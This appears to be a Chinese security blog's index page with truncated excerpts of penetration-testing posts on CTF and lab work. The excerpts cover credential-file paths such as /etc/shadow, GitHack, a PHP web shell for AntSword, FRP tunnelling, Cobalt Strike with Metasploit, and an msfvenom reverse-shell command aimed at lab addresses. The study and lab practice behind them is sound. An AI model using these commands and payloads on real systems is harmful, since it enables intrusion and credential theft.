thumbnail
【原创 精华 付费】MAC优秀工具安装及解决方案合集(持续更新)
[huayang] 新系统太卡了重装了一下,发现问题多多的故写此文以便日后查阅 因为我是搞安全的所以此文章也对有此方向的同学们具有有参考意义 推荐下载地址(mac) macwk 马可波罗 软件 FinalShell(SSH工具) Magnet Pro(分屏) 谷歌浏览器 火狐浏览器 docker 搜狗输入法 钉钉 steam vscode PyCh…
【原创】常用服务器绝对路径
[huayang] /etc/passwd 是linux系统保存用户信息及其工作目录的文件 /etc/shadow 是linux系统保存用户信息及(可能存在)密码(hash)的文件 /etc/apache2 是apache的配置文件,可以看见web的目录和服务端口等信息,常用于确认路径 /etc/nginx nginx配置文件,,可以看见web的目…
thumbnail
【原创 精华 付费】常用渗透工具的使用
泄露 github泄露 githack(python2环境) python GitHack.py http://challenge-dd0303e023385e74.sandbox.ctfhub.com:10800/.git 进入dist目录会生成一个带有.git隐藏文件的目录,进入目录 git log //查看历史信息 找到add就是本次的提交 …
【原创】内网穿透案例
[huayang] 案列一(Frp内网渗透) 大概图列 网上随便找的,路线是这个样子 这里选用ctfshow的一道命令执行题 由Frp实现内网访问及扫描 1.传入一句话,上线蚁剑 http://b85fdf24-b98e-4810-9e76-a038a8987630.challenge.ctf.show:8080/?c=`echo '<?ph…
thumbnail
【原创 精华】CobaltStrike与msf联动
[huayang] 基础 大致使用方法 注意:这里创建的ip指向的开cs服务器的ip不是cs应用的ip 如果kali开服务 win开应用 则下面的ip指向kali cs与msf联动 cs发送给msf cs拿到服务器后再新建个监听 建好过后去msf开启监听 run一下 进入beacon即可看见运行 这样就顺利连上了 msf发送给cs 比如我在msf上…
thumbnail
【原创】macOS安装CobaltStrike(内网,公网)
[huayang] 这个必须在linux下环境启用且拥有java环境 所以最好的办法就是在kali里搭建 首先把文件移到kali,给权限 搭建服务 kali的ip加密码 这样就算启动好了,再去物理机ping kali,能通就直接打开cs https://hellohy.top/huayang/7146.html [/huayang]
【原创】macOS下PhpStorm 配置
[huayang] 下载地址:https://www.jetbrains.com/phpstorm/download/#section=mac mamp下载地址:https://www.mamp.info/en/downloads/ 非永久激活:http://idea.medeming.com/jets/ 外观 服务 配置mamp 打开mamp,点…
MSF简单提权开启远程桌面并连接
[huayang] 攻击机: kali:172.16.181.8 win sever2012 :172.16.181.4 目标机: win7:172.16.181.9 建立连接 msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.181.8 LPORT=4444 -f exe -o 12…
【原创 精华】一些其他的小技巧
[huayang] 传文件 拿到shell后我们需要把文件传到目标机 现在我们是低权限,不能随便传目录 只有传送users目录下的用户 不知道用户名怎么办? 我们先cd C:\users再ls看看即可 知道了用户名我们最好传入文档里(记得是两个反斜杠\\),也就是C:\Users\华扬\Documents 注意“C”一定要大写!!! shell 乱…
thumbnail
【原创 精华 付费】服务器安装渗透工具及解决方案(持续更新)
归去来兮,请息交以绝游。世与我而相违,复驾言兮焉求?悦亲戚之情话,乐琴书以消忧。农人告余以春及,将有事于西畴。或命巾车,或棹孤舟。既窈窕以寻壑,亦崎岖而经丘。木欣欣以向荣,泉涓涓而始流。善万物之得时,感吾生之行休。   已矣乎!寓形宇内复几时?曷不委心任去留?胡为乎遑遑欲何之?富贵非吾愿,帝乡不可期。怀良辰以孤往,或植杖而耘耔。登东皋以舒啸,临清流…